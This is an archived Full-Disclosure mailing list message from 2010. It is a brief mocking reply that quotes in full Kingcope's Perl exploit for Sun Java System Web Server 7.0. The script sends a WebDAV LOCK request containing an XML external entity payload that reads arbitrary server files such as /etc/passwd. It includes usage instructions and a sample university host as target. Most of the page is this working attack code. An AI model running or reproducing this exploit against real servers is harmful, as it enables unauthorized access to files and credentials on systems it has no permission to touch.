| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 3 Apr 2010 16:37:19 +0200
From: Christian Sciberras <uuf6429@...il.com>
To: Kingcope <kcope2@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Sun D3VS SM0KiNG PoT AGAiN
"Sun D3VS SM0KiNG PoT AGAiN"
"SuPP0RT iF YOU#RE kRAD KTHX"
What the fuck is wrong with you guys?
Ever gave the psychiatrist a visit?
On Sat, Apr 3, 2010 at 3:14 PM, Kingcope <kcope2@...glemail.com> wrote:
> sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD
> KTHX
>
> #!/usr/bin/perl
> # aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT
> # oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
> # oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
> # oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
> # !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
> # MAY/2010
> # VERY THANKS TO LSD
> #
> #
> # oO VERiFIED oN Oo
> #
> # SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS
> SERVER 2008 & SunOS 5.10]
> # SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
> # [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
> # RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
>
> use IO::Socket;
> use MIME::Base64;
>
> print "//Sun Microsystems Sun Java System Web Server\n";
> print "//Remote File Disclosure Exploit\n";
> print "//by Kingcope\n";
> print "May/2010\n";
>
> if ($#ARGV != 2) {
> print "usage: perl sunone.pl <target> <webdav directory> <file to
> get>\n";
> print "sample: perl sunone.pl lib7.berkeley.edu /dav
> /etc/passwd\n";
> exit;
> }
>
> $target = $ARGV[0];
>
> $|=1;
>
> $remotefile = $ARGV[2];
> $folder = $ARGV[1];
>
> $KRADXmL =
> "<?xml version=\"1.0\"?>\n"
> ."<!DOCTYPE REMOTE [\n"
> ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
> ."]>\n"
> ."<D:lockinfo xmlns:D='DAV:'>\n"
> ."<D:lockscope><D:exclusive/></D:lockscope>\n"
> ."<D:locktype><D:write/></D:locktype>\n"
> ."<D:owner>\n"
> ."<D:href>\n"
> ."<REMOTE>\n"
> ."<RemoteX>&RemoteX;</RemoteX>\n"
> ."</REMOTE>\n"
> ."</D:href>\n"
> ."</D:owner>\n"
> ."</D:lockinfo>\n";
>
> $sock = IO::Socket::INET->new(PeerAddr => $target,
> PeerPort => '80',
> Proto => 'tcp');
>
> print $sock "LOCK /$folder HTTP/1.1\r\n".
> "Host: $target\r\n".
> "Depth: 0\r\n".
> "Connection: close\r\n".
> "Content-Type: application/xml\r\nContent-Length:
> ".length($KRADXmL)."\r\n\r\n".
> $KRADXmL;
>
> $locktoken = "";
> while(<$sock>) {
> if ($_ =~ /^Lock-token:\s(.*)?\r/) {
> $locktoken = $1;
> chomp $locktoken;
> }
> print;
> }
>
> close($sock);
>
> $sock = IO::Socket::INET->new(PeerAddr => $target,
> PeerPort => '80',
> Proto => 'tcp');
>
> print $sock "UNLOCK /$folder HTTP/1.1\r\n".
> "Host: $target\r\n".
> "Connection: close\r\n".
> "Lock-token: $locktoken\r\n\r\n";
>
> while(<$sock>) {
> print;
> }
> close($sock);
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists